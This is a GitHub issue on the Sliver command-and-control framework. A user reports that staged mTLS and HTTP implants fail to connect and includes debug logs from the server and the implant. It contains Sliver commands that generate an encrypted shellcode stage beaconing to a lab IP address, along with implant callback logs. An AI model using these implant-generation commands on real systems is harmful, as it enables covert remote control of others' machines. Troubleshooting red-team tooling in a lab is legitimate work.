Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

mtls stage error #1903

Open
Kano-2525-a opened this issue Mar 12, 2025 · 1 comment
Open

mtls stage error #1903

Kano-2525-a opened this issue Mar 12, 2025 · 1 comment

Comments

@Kano-2525-a
Copy link

profiles new --mtls 10.211.55.2:1236 --format shellcode --arch amd64 stage
profiles stage win64_stage --aes-encrypt-key "D(G+KbPeShVmYq3t" --aes-encrypt-iv "8y/B?E(G+KbPeShV"

I wrote a program, downloaded this stage, and then ran it,

server log:
INFO[2025-03-12T14:14:55+08:00] [sliver/server/c2/mtls.go:88] Accepted incoming connection: 10.211.55.6:59742
ERRO[2025-03-12T14:14:55+08:00] [sliver/server/c2/mtls.go:191] Un-marshaling envelope error: proto: cannot parse invalid wire-format data
ERRO[2025-03-12T14:14:55+08:00] [sliver/server/c2/mtls.go:106] Socket read error proto: cannot parse invalid wire-format data

debug log:
2025/03/12 14:05:54 sliver.go:129: Hello my name is ACCURATE_CRAFTSMAN
2025/03/12 14:05:54 limits.go:58: Limit checks completed
2025/03/12 14:05:54 sliver.go:147: Running in session mode
2025/03/12 14:05:54 session.go:69: Starting interactive session connection loop ...
2025/03/12 14:05:54 transports.go:41: Starting c2 url generator () ...
2025/03/12 14:05:54 transports.go:104: Return generator: (chan *url.URL)(0xc000111140)
2025/03/12 14:05:54 transports.go:92: Yield c2 uri = 'mtls://10.211.55.2:1236'
2025/03/12 14:05:54 transports.go:92: Yield c2 uri = 'mtls://10.211.55.2:1236'
2025/03/12 14:05:54 session.go:86: Next CC = mtls://10.211.55.2:1236
2025/03/12 14:05:54 session.go:176: Connecting -> 10.211.55.2:1236
2025/03/12 14:05:54 session.go:86: Next CC = mtls://10.211.55.2:1236
2025/03/12 14:05:54 transports.go:92: Yield c2 uri = 'mtls://10.211.55.2:1236'
2025/03/12 14:05:54 uuid_windows.go:48: Registry host uuid value too short
2025/03/12 14:05:54 sliver.go:327: Host Uuid: 53bea3c3-8d66-41a5-a755-cccf64bf635c
2025/03/12 14:05:54 tun.go:53: [tunnel] Tunnel handlers map[20:0x2a58d780660 22:0x2a58d77f380 23:0x2a58d77e9c0 80:0x2a58d77f8a0 82:0x2a58d7815e0 125:0x2a58d782540]
2025/03/12 14:05:54 mtls.go:134: Socket error (read msg-length): EOF
2025/03/12 14:05:54 session.go:218: [mtls] eof
2025/03/12 14:05:54 session.go:159: [mtls] lost connection, cleanup...
2025/03/12 14:05:54 session.go:168: [mtls] Stop()
2025/03/12 14:05:54 sliver.go:170: Reconnect sleep: 1m0s
2025/03/12 14:06:54 session.go:176: Connecting -> 10.211.55.2:1236
2025/03/12 14:06:54 session.go:86: Next CC = mtls://10.211.55.2:1236
2025/03/12 14:06:54 transports.go:92: Yield c2 uri = 'mtls://10.211.55.2:1236'
2025/03/12 14:06:54 uuid_windows.go:48: Registry host uuid value too short
2025/03/12 14:06:54 sliver.go:327: Host Uuid: 53bea3c3-8d66-41a5-a755-cccf64bf635c
2025/03/12 14:06:54 tun.go:53: [tunnel] Tunnel handlers map[20:0x2a58d780660 22:0x2a58d77f380 23:0x2a58d77e9c0 80:0x2a58d77f8a0 82:0x2a58d7815e0 125:0x2a58d782540]

mtls.go:
if err != nil || n != 4 {
mtlsLog.Errorf("Socket error (read msg-length): %v", err)
return nil, err
}
@Kano-2525-a
Copy link
Author

http stage error

37.36 (KHTML, like Gecko) Chrome/107.0.6964.521 Safari/537.36
ERRO[2025-03-13T11:20:48+08:00] [sliver/server/c2/http.go:584] Failed to decode session init

2025/03/13 11:21:48 session.go:84: Next CC = https://10.211.55.2:1236
2025/03/13 11:21:48 transports.go:92: Yield c2 uri = 'https://10.211.55.2:1236'
2025/03/13 11:21:48 session.go:172: Connecting -> http(s)://10.211.55.2:1236
2025/03/13 11:21:48 drivers_windows.go:40: Using go http driver
2025/03/13 11:21:48 httpclient.go:875: [http] segments = [authenticate auth auth authenticate], filename = register, ext = php
2025/03/13 11:21:48 httpclient.go:356: [http] POST -> https://10.211.55.2:1236/authenticate/auth/auth/authenticate/register.html?x=3110g58885751 (266 bytes)
2025/03/13 11:21:49 httpclient.go:399: [http] response decrypt failure: decryption failed
2025/03/13 11:21:49 drivers_windows.go:40: Using go http driver
2025/03/13 11:21:49 httpclient.go:875: [http] segments = [auth rest rest rest], filename = index, ext = php
2025/03/13 11:21:49 httpclient.go:356: [http] POST -> http://10.211.55.2:1236/auth/rest/rest/rest/index.html?e=552508939529 (266 bytes)
2025/03/13 11:21:49 httpclient.go:362: [http] http response error: Post "http://10.211.55.2:1236/auth/rest/rest/rest/index.html?e=552508939529": read tcp 10.211.55.6:61129->10.211.55.2:1236: wsarecv: An existing connection was forcibly closed by the remote host.
2025/03/13 11:21:49 session.go:178: http(s) connection error Post "http://10.211.55.2:1236/auth/rest/rest/rest/index.html?e=552508939529": read tcp 10.211.55.6:61129->10.211.55.2:1236: wsarecv: An existing connection was forcibly closed by the remote host.
2025/03/13 11:21:49 sliver.go:190: [session] failed to establish connection: Post "http://10.211.55.2:1236/auth/rest/rest/rest/index.html?e=552508939529": read tcp 10.211.55.6:61129->10.211.55.2:1236: wsarecv: An existing connection was forcibly closed by the remote host.
2025/03/13 11:21:49 sliver.go:170: Reconnect sleep: 1m0s

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@Kano-2525-a